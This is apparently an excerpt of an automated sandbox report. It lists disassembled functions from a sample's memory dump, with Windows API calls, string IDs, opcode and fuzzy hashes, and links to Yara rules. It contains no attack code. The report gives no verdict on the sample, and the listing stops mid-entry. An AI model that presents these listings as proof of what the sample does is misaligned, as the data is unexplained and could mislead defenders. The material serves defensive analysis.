                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 30475346a5b3280e2f9f1991365065c8910ac3705553d435220e8994952ac55a
                                                                                                                                                                                                                                                                                                        • Instruction ID: a3725c718f868d7b547337830c6269bfeba01745dd682398a3f91361f16e6038
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30475346a5b3280e2f9f1991365065c8910ac3705553d435220e8994952ac55a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DEE01AB9D00204DFCB619FE0C688B5DBBB1EB28310F108409F88AE3244C73E5942AF00
                                                                                                                                                                                                                                                                                                        Function 0100EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 0100EC4A
                                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 0100EC54
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0100EC60
                                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(?), ref: 0100EC81
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 15572027c2d73c1bb96d1a36aa40a04089aa86aa6913f7434e60dfe048de8422
                                                                                                                                                                                                                                                                                                        • Instruction ID: 38153ec4ce8850258eede01a7f999dc18fc34a08d9cf6dbc607affab7b14babe
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15572027c2d73c1bb96d1a36aa40a04089aa86aa6913f7434e60dfe048de8422
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95E01AB9D00204DFCB609FE0C688A5DBBB1AB28310B108409F88AE3244C73D5901AF00
                                                                                                                                                                                                                                                                                                        Function 010257CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB41EA: _wcslen.LIBCMT ref: 00FB41EF
                                                                                                                                                                                                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 01025919
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: *$LPT
                                                                                                                                                                                                                                                                                                        • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                                        • Opcode ID: ad2e6c095b635c73a7943df57f871046284bddda13295f0a7f66f1d4186ff20c
                                                                                                                                                                                                                                                                                                        • Instruction ID: d298a0f2241d40e006383f97aa350c681d844f2a3d09302364409c8e26418346
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad2e6c095b635c73a7943df57f871046284bddda13295f0a7f66f1d4186ff20c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E919D75A002149FDB14CF58C885EEABBF5AF44304F188099E88A9F362C775EE85CF94
                                                                                                                                                                                                                                                                                                        Function 00FDE5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00FDE67D
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                                        • String ID: pow
                                                                                                                                                                                                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                                        • Opcode ID: 981160d69b0eb8c3732cdceb032e65809b993585d4ba0838080ca05b21b62fe0
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7f64104b954e96d3f60a8ce6c343225c2a6155ff2dfad7ff62099143f71ecfd1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 981160d69b0eb8c3732cdceb032e65809b993585d4ba0838080ca05b21b62fe0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16513871E1864186C7217715CD0136A3BA1AB50BA0F284D5AF0D94A3EDEE3ECC97BB46
                                                                                                                                                                                                                                                                                                        Function 00FCA8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID: #
                                                                                                                                                                                                                                                                                                        • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                                        • Opcode ID: 77037f6985628cde5d0e880773746787b8de6bad39e7768185d775ff1435674a
                                                                                                                                                                                                                                                                                                        • Instruction ID: dcb56e7fccd6e4ab9eba9c44cf48ad1f978c4e24a9944553e10098dbc1b72a62
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77037f6985628cde5d0e880773746787b8de6bad39e7768185d775ff1435674a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8251293190424ADFEB26DF28C482BFA7BA0BF05314F15805EE9D19B2C1DB38A942DB51
                                                                                                                                                                                                                                                                                                        Function 00FCF6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00FCF6DB
                                                                                                                                                                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00FCF6F4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                                        • Opcode ID: e40fc59cdd0cfdc33501cf9e35e52b38384a5c8dbd2683368a8acfc3d6e2a153
                                                                                                                                                                                                                                                                                                        • Instruction ID: 31088bdfd1165a7650d9f5ff82cd20bd682d790c5e66df3de3406193a8fdb04e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e40fc59cdd0cfdc33501cf9e35e52b38384a5c8dbd2683368a8acfc3d6e2a153
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB516AB1918748ABD320AF11DC86BAFBBECFF94300F81484DF1D951195DB398529CB26
                                                                                                                                                                                                                                                                                                        Function 010361A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                                                        • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                                                        • Opcode ID: 51579671108156163bc76f21e41e285525867c744b46ddf8be5c524e24b48698
                                                                                                                                                                                                                                                                                                        • Instruction ID: fb13d382fb0c72a3bb20e09a5c8e2c5f75fd5494883fea36f30af9d025a8f862
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51579671108156163bc76f21e41e285525867c744b46ddf8be5c524e24b48698
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2041E271E00609AFCB04DFA9C8819FEBBF9FF88320F114069F455A7252D7769A81CB90
                                                                                                                                                                                                                                                                                                        Function 0102DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0102DB75
                                                                                                                                                                                                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0102DB7F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: |
                                                                                                                                                                                                                                                                                                        • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                                        • Opcode ID: d892a82567763bda09d73f9d8ddb0e9b9ec2168738d0750716e1a2dbe30d8365
                                                                                                                                                                                                                                                                                                        • Instruction ID: cd4a194600a875ca6139bdf53e97edf584401336f52be57e796501a53cf4ae1b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d892a82567763bda09d73f9d8ddb0e9b9ec2168738d0750716e1a2dbe30d8365
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A731AD71801119ABCF41DFA5CC94AEEBFB9FF04340F100069F905A7262EB759A02DF50
                                                                                                                                                                                                                                                                                                        Function 01044008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 010440BD
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 010440F8
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                                        • String ID: static
                                                                                                                                                                                                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                                        • Opcode ID: 433f3de62f1703c8655f668efaaeec0b15c67d55d529f7d2ee6b4c486e2abf64
                                                                                                                                                                                                                                                                                                        • Instruction ID: 20eea7ba30ca09a954822dc29539f1fbc0c0ffe751afdc00e6db4513c082d961
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 433f3de62f1703c8655f668efaaeec0b15c67d55d529f7d2ee6b4c486e2abf64
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09317EB1510604ABDB25DF68CC80FFB77A9FF48724F008629F9A5C7181DA75E891DB60
                                                                                                                                                                                                                                                                                                        Function 01044FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 010450BD
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 010450D2
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                                        • String ID: '
                                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                                        • Opcode ID: f32188e4325382792bd43225ced7b3e3ecbfee87ce36a59613c9bdfeaca466f4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7065958a5eb770c9e3fefc3dd4da8e12a90969e71127f07330ff3cec783ac1a6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f32188e4325382792bd43225ced7b3e3ecbfee87ce36a59613c9bdfeaca466f4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E131E7B8A0120A9FDB54CF69C981BDE7BF5BF49300F104069EA44AB356D771A945CF90
                                                                                                                                                                                                                                                                                                        Function 010441AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FB78B1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7873: GetStockObject.GDI32(00000011), ref: 00FB78C5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB78CF
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 01044216
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000012), ref: 01044230
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                                        • String ID: static
                                                                                                                                                                                                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3c07c57b3cf82dd4343500e871c3e0c1c7c0fdff9904d2e5b7fc6668c31a1770
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1f6dcbe64821bdb0ee922c1998a8dbb3b9cc12a5573d3bd5f79b2cb8744e186c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c07c57b3cf82dd4343500e871c3e0c1c7c0fdff9904d2e5b7fc6668c31a1770
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A1126B261020AAFDB11DFA8C985AEE7BF8EB08314F014924F995E3240D675E8509B60
                                                                                                                                                                                                                                                                                                        Function 0102D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0102D7C2
                                                                                                                                                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0102D7EB
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                                        • String ID: <local>
                                                                                                                                                                                                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9877911e1ebd986fa2c6ee87584451a9dfc0c5d05d312dd1588c6a472877f2bc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2b71529799f7ca2dbf0e00b6b66760c38d6f58fdb79805b03ab80954fcae88cc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9877911e1ebd986fa2c6ee87584451a9dfc0c5d05d312dd1588c6a472877f2bc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA1106B11012727AD7344BA68C89EE7BE9DFB126A4F00422AF58982080E2688C40C7F0
                                                                                                                                                                                                                                                                                                        Function 010175ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,?,?), ref: 0101761D
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01017629
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
